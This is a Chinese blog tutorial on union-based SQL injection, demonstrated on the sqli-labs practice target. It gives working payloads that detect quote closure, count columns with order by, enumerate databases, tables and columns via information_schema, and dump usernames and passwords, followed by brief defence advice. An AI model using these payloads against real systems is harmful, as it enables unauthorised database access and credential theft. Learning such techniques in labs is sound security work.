基于Union的联合SQL注入

最新推荐文章于 2024-05-29 00:11:31 发布
最新推荐文章于 2024-05-29 00:11:31 发布
阅读量966 收藏 24
点赞数 31
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64368365/article/details/136045576
版权
本文详细介绍了SQL注入的概念,通过实例展示了如何利用各种payload进行攻击,包括闭合符判断、字段数量检测等。同时,文章强调了防御SQL注入的重要性,提倡对用户输入进行验证和限制数据库权限以保障系统安全。
摘要由CSDN通过智能技术生成

一、对SQL注入的认识

     SQL注入是基于在动态构造SQL动态注入语句时未对用户输入进行充分的验证和过滤,攻击者利用这个漏洞通过用户输入插入恶意代码来改变原始SQL查询的逻辑结构从而达到控制数据库的目的。

二、基础知识和准备

1、一库三表六字段

一库

information_schema

三表

schemate             库名     

tables                   表名

columns               字段名

六字段

schemata表的        schema_name    库名

tables 表的             table_schema     库名

tables表的              table_name         表名

columns表的          table_schema     库名

columns表的          table_name         表名

columns表的          column_name     字段名

 2、HackBar插件

 插件的具体下载方法大家可以去下面这篇文章里学习。

如何在火狐浏览器上安装插件 作者:一懒众山小~

 三、让我们开始做SQL注入吧

(本文用了sqli-labs-php7-master靶场做演示)

1、判断输入是否有闭合符

2、判断闭合符

3、判断字段个数

4、判断回显位

5、判断当前库名和SQL版本

6、查询所有数据库库名 

7、查询指定库的所有表 

8、查询字段名

9、查询字段内容

1、判断输入是否有闭合符

Payload:   

1 and 1=2

如果是字符型:’1 and 1=2’会被当做一个字符不会报错

Select * from users where id=’1 and 1=2’limit 0,1

如果是数字型and 1=2变成判断条件1!=2所以不满足条件查不出来信息

Select * from users where id=1 and 1=2 limit 0,1

 下面的图片就是一个有闭合符的情况,因为是字符型,所以被当成了一个字符。

2、判断闭合符 

  根据第一步判断是字符型,存在闭合符所以我们要进一步判断闭合符是啥,我们来看看闭合符都有啥。

id='1'

id="1"

id=(‘1’)

id=("1") 

   当输入一个一点不沾边的错误包裹符时不报错

   当包裹符是  '   时和输入的   ")   一点不沾边此时不报错因为  1 ”)被当做是字符串

Select * from users where id=’1 ”)’limit 0,1  

   当输入一个错误包裹符但这个正确包裹符是错误包裹符的一部分时报错

   因为’1 他俩会成一对所以   ’limit 0,1 会报错因为  )’是多余的。但是我们此时就可以看出来正确包裹符因为报错信息信息中  )'  ,因为  )  后面的  ' 不是我们输入的,是他本身带的包裹符。

Select * from users where id=’1 ’)’limit 0,1

  当输入包裹符正确时也会报错’1 ’limit 0,1会报错 ,因为多了一个 ’

Select * from users where id=’1 ’’limit 0,1

3、判断字段个数

用order by 进行排序

order by n -- 当有n个数时不报错,当没有n个数时报错

当n=3时不报错,n=4就报错所以有三个字段 

4、判断回显位

  判断这三个字段的哪两个字段输出的

  根据ID查询,这里的ID不能合法,因为合法就会查出内容,查出来就看不出来哪列回显所以ID=-1,可以判断出回显在第2、3位。

id =-1' union select 1,2,3 -- -

5、判断当前库名和mysql版本

  版本只有MySQL 5.0及以上版本有information_schema库

id =-1' union select 1,database(),version()-- -

6、查询所有数据库库名 

id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata -- -

7、查询指定库的所有表 

id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' -- -

8、查询指定库指定表的所有字段

id=-1' union select 1, group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema=database() -- -

9、查看字段中所有内容

id=-1 union select id,group_concat(username),group_concat(password) from security.users --+

四、防御SQL注入

   了解了原理我们也应该从中得到提示,SQL注入漏洞值得我们注意,但解决这个问题并不难,对用户输入的信息进行过滤,确保输入符合预期的格式类型,对敏感信息进行加密并限制数据库用户的权限。

                                     最后的最后!!!要在靶场测试!!! 不要违法哦!!!

  

llyiing
关注
  • 31
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
22-2 GET基于报错的sql注入利用-脱库
weixin_43263566的博客
01-24 268
因为在上一篇文章已经找出sql注入靶场前四关的注入点与闭合符,下面的操作我们基于这个基础上实现。
SQL注入-基于联合查询的数字型GET注入
weixin_46831054的博客
02-16 3617
实验原理 数字型GET注入,其注入点存在于URL中的参数处。 攻击者可以通过构造恶意的get输入参数,利用union select命令进行注入,暴露数据库中存储的信息。 实验一 步骤: 1.访问靶机网站:http://127.0.0.1:456/Less-2/ 登录后,根据网页,给出GET参数 ?id=1 显示出用户名:Dumb,密码:Dumb 注:该实验利用Firefox的插件:Hackbar。没有该插件可到搜索框里输入payload参数。 2.寻找注入点 http://127.0.0.1:456/L
SQL-union注入
m0_62886641的博客
04-22 136
burpsuite使用以及union注入,是自己的复习笔记
SQL注入(一)之union注入
木尤的博客
07-08 3026
SQL注入(一)之union注入SQL注入的前期,第一件事情就是找到SQL注入点,在找到注入点后开始下面的内容: 一、联合查询法(一) a.判断注入点: and 1=1 --返回true,显示正常 and 1=2 --返回false,显示错误 b.猜多少列 order by [数值] c.联合查询猜表名 union select 1,2,3,……,7 from users --猜表名并记录返回回显位(报错说明表不存在,将表名更换继续猜) d.联合查询猜列名 union select 1,2,u
sql注入union联合注入
m0_63436163的博客
01-30 944
联合查询注入联合两个表进行注入攻击,使用关键词 union select 对两个表进行联合查询。两个表的字段数要相同,不然会出现报错。列数相同union 特性是显示两张表 我们就可以吧第一个参数变为------负--的 或者不存在的值 就行了 显示就是以第二张表为主。
sql注入union联合注入_sql注入union
2401_83739411的博客
04-12 943
1、如果都报错,则为整形闭合。2、如果单引号报错,双引号不报错。然后尝试?id=1 –– 无报错则单引号闭合。报错则单引号加括号。3、如果单引号不报错,双引号报错。然后尝试?id=1"––无报错则双引号闭合。报错则双引号加括号。4、判断真值的方法是指通过构造一个条件语句,利用应用程序返回的结果来判断闭合方式如果是没有报错回显的情况,则可以用判断真值的方法来判断闭合方式。例如:输入index.php?id=1’,页面显示错误再输入index.php?id=1’ --+,页面显示正确。
sql注入-union注入union函数 联合注入
07-11 7420
union注入】可与报错注入、盲注、堆叠注入等方法结合使用
sql注入——union联合注入
hintll的博客
06-22 1018
sql注入——union联合注入 union注入sql注入的一大类型 在做有关sql联合注入时一般用以下思路进行解题: 1.首先要找到能与数据库交互的注入点: 2.测试字段的数量,判断SQL语句查询的列数: 在这里我们使用的命理是order by 通常构造:?id=1’ order by sum–+ 和 1’ order by sum# 这里的sum指代的是数字从1开始逐个测试直至3回显有报错为止: ?id=1’ order by 1–+ ?id=1’ order by 2–+ ?id=1’ orde
第四节 基于报错的SQL注入-01
09-15
基于报错的SQL注入 SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过在输入参数中inject恶意SQL代码来获取敏感数据或控制服务器。今天,我们将讨论基于报错的SQL注入,包括其分类、发现和利用方法。 SQL注入...
SQL注入-联合查询注入union
qq_57307348的博客
01-23 3629
目录 SQL注入的一库三表 union联合查询注入注意事项 MySQL函数利用 1、常用函数 2、连接字符串函数 联合查询注入union 利用前提 联合注入的过程 1、先判断有没有注入点 3、判断有多少列 4、判断显示位 5、显示有哪些数据库 6、显示数据库中有哪些表 7、显示表中有哪些字段(以users为例) 8、获取字段 SQL注入的一库三表 information_schema 元数据数据库 (数据库名, 表名, 字段...
基于MySQLSQL注入攻击(20191202232232).pdf
12-02
标题《基于MySQLSQL注入攻击》所涉及的知识点主要围绕SQL注入攻击的原理、防御以及在基于MySQL数据库环境下实施的攻击案例。具体来看,可以分为以下几个方面: 1. SQL注入的定义与工作原理:SQL注入攻击是一种...
SQL显错(union注入基础深度剖析(原理)
m0_46304840的博客
03-03 2438
前言 前面基础应该写的差不多了,至于关于编程语言我会后面再写 正文 什么是sql注入sql注入 指 web应用程序没有对用户输入的数据进行判断,导致前端传入后端的参数 可以被攻击者所控制,并且带入数据库执行 $sql = "SELECT * FROM users where id = $GET['id']"; 因为这里的参数,id可以可以控制,所以会被攻击者进行拼接...
SQL注入union 联合注入
weixin_53711701的博客
01-16 4676
SQL注入union联合注入
sql注入(Union注入攻击)
m0_65463546的博客
12-08 1275
这段时间自我摸索着学习了下sql注入,学习的过程中发现了一些小白学习初期可能会犯的错误,也想把自己学习过程中的心得与体会分享给大家,希望能帮助到大家!好了,接下来就开始我们的正题!在数据库中,当我们需要将两个表的查询内容合并到一张表去显示,就需要使用我们的Union去拼接。例如:select 字段1,字段2,字段3 from为什么会报错?即两表查询字段数量不一致。
SQL注入union注入学习笔记整理
spongbob1的博客
11-22 1831
union注入即为用union联合查询来查询指定的数据,需要根据每一步的返回结果来判断和进行下一步操作。此仅为个人的学习笔记。 结构 联合查询的语句结构基本为: select a from b union select c from d where e; union会一次显示两个查询结果,使第一个查询语句作为正常内容,第二个作为查询语句来进行构造。 第一步:判断类型 数字型判断 共分3步判断步骤: 1.加单引号,如输入id=1’,对应的sql为:select * from table where id=1
15分钟了解sql注入(一) union注入
贤鱼的博客
09-24 1885
union注入详细教程
Web渗透-MySql-Sql注入联合查询注入
最新发布
WolvenSec的博客
05-29 1360
SQL注入SQL Injection)是一种网络攻击技术,攻击者通过将恶意的SQL代码插入到应用程序的输入字段,从而欺骗应用程序执行未经授权的操作。这种攻击方式可以导致严重的安全问题,包括:数据泄露:攻击者可以未经授权地访问和检索数据库中的敏感数据。数据篡改:攻击者可以修改、删除或添加数据库中的数据。身份冒充:攻击者可以冒充其他用户,包括管理员,从而获得更高的权限。拒绝服务:通过破坏数据库或使其负载过重,使得数据库无法正常提供服务。
SQL注入漏洞(union + 盲注)
m0_61506558的博客
09-16 1677
数据库漏洞一直处于OWASP前几名,虽然在2021年滑到第三,漏洞的危害是不言而喻的,数据库可以分为两种:关系型数据库:关系型数据库,存储的格式可以直观地反映实体间的关系。关系型数据库和常见的表格比较相似, 关系型数据库中表与表之间是有很多复杂的关联关系的。常见的关系型数据库有 MySQL,Oracle, PostgreSQL,SQL Server等。
SQL注入的一库三表六字段
06-10
一库三表六字段是指SQL注入攻击者通常会针对一个数据库,选择其中的三个表,然后针对这三个表中的六个字段进行注入攻击。这种攻击方式通常是通过构造带有恶意代码的SQL语句来实现的,攻击者可以利用这些恶意代码来获取数据库中的敏感信息、篡改数据或者执行其他恶意操作。 为了防止SQL注入攻击,开发人员应该采取一些措施来保护Web应用程序的数据库,如使用参数化查询、对用户输入进行过滤和验证、限制数据库用户的权限等。另外,还应该定期对Web应用程序进行安全审计和漏洞扫描,及时发现和修复可能存在的漏洞。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值